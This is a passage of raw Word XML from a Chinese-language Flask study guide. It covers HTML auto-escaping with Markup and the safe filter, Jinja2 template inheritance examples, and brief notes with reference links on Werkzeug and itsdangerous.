    <w:p w14:paraId="0CABAA1E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>标记</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Markup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>safe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>过滤器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以不导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转义</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A9FDE4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="047DF3A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>自动转义功能默认是开启的，所以如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> name </w:t>
      </w:r>
      <w:r>
        <w:t>包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:t>，它将会被自动转义。如果你能信任一个变量，并且你知道它是安全的（例如一个模块把</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wiki </w:t>
      </w:r>
      <w:r>
        <w:t>标记转换为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML</w:t>
      </w:r>
      <w:r>
        <w:t>），你可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Markup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> |safe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>过滤器</w:t>
      </w:r>
      <w:r>
        <w:t>在模板中把它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>标记为安全</w:t>
      </w:r>
      <w:r>
        <w:t>的。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Jinja 2 </w:t>
      </w:r>
      <w:r>
        <w:t>文档中，你会看到更多的例子。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF81082" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9E4972" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; from flask import Markup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C74602B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; Markup('&lt;strong&gt;Hello %s!&lt;/strong&gt;') % '&lt;blink&gt;hacker&lt;/blink&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A55F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Markup(u'&lt;strong&gt;Hello &amp;lt;blink&amp;gt;hacker&amp;lt;/blink&amp;gt;!&lt;/strong&gt;')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DFF65D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; Markup.escape('&lt;blink&gt;hacker&lt;/blink&gt;')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB1245" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Markup(u'&amp;lt;blink&amp;gt;hacker&amp;lt;/blink&amp;gt;')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F8BBA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&gt;&gt;&gt; Markup('&lt;em&gt;Marked up&lt;/em&gt; &amp;raquo; HTML').striptags()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B43E6A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>u'Marked up \xbb HTML'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F4B7F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0541442A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33E0A7CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C91FADA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17514A73" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="584" w:name="_Toc159780017"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模板集成</w:t>
      </w:r>
      <w:bookmarkEnd w:id="584"/>
    </w:p>
    <w:p w14:paraId="24A1DBAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70750A4E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://docs.jinkan.org/docs/flask/patterns/templateinheritance.html#template-inheritance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551954B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47D3A60E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>基础模板</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D963C0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>在这个例子中，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {% block %} </w:t>
      </w:r>
      <w:r>
        <w:t>标签定义了四个子模板可以重载的块。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> block </w:t>
      </w:r>
      <w:r>
        <w:t>标签所做的的所有事情就是告诉模板引擎</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>一个子模板可能会重写父模板的这个部分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278ABE2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10AE9D11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!doctype html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC4B0D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5967FC33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05431F80" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {% block head %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1C2559" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D1BBDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;title&gt;{% block title %}{% endblock %} - My Webpage&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662038B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {% endblock %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2BB55E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D9CA8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3BDF7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;div id="content"&gt;{% block content %}{% endblock %}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F9593C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;div id="footer"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE12DAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {% block footer %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A27914" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &amp;copy; Copyright 2010 by &lt;a href="http://domain.invalid/"&gt;you&lt;/a&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0BBA53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {% endblock %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F7D5A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB1BF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FBA499" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE65654" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>子模版</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118A98B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D10F01C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">{% extends %} </w:t>
      </w:r>
      <w:r>
        <w:t>是这个例子的关键，它会告诉模板引擎这个模板继承自另一个模板的，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>模板引擎分析这个模板时首先会定位其父父模板。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">extends </w:t>
      </w:r>
      <w:r>
        <w:t>标签必须是模板的首个标签。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>想要渲染父模板中的模板需要使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {{ super() }}</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD816EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F430C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{% extends "layout.html" %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4400225A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{% block title %}Index{% endblock %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5432AB4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{% block head %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E2127F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  {{ super() }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EC5919" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;style type="text/css"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B22C816" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    .important { color: #336699; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2062A9B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0415B464" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{% endblock %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB60AD0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{% block content %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C9A708" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;h1&gt;Index&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74198CBC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;p class="important"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1338F64B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Welcome on my awesome homepage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4D679A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{% endblock %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338C35F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FE44D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="585" w:name="_Toc159780018"/>
      <w:r>
        <w:t>Werkzeug</w:t>
      </w:r>
      <w:bookmarkEnd w:id="585"/>
    </w:p>
    <w:p w14:paraId="49A35088" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WSGI </w:t>
      </w:r>
      <w:r>
        <w:t>工具集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1955513E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:t>http://werkzeug.pocoo.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791A7736" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075C3B98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="586" w:name="_Toc159780019"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>itsdangerous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：网络加密数据</w:t>
      </w:r>
      <w:bookmarkEnd w:id="586"/>
    </w:p>
    <w:p w14:paraId="7866FC20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pypi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://pypi.org/project/itsdangerous/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E34386" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>教程：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://itsdangerous.palletsprojects.com/en/2.1.x/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A234BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37CDEDF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大概的意思就是说，你用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>itsdangerous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库，可以给服务端和接收信息的人一个密钥。然后你可以大胆的把数据公开交换，不用担心有人篡改数据。应用之一就是，这个可以直接设置在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中用来保持会话，不需要反复读写数据库设置会话标识。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722EABCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038151C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pip install -U itsdangerous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B20A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="788F7216" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3218BFA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A7C9D9D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B7823B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300BBE04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D857C37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14FB1EE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00DC4980" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="587" w:name="_Toc159780020"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>graphql</w:t>
      </w:r>
      <w:bookmarkEnd w:id="587"/>
    </w:p>
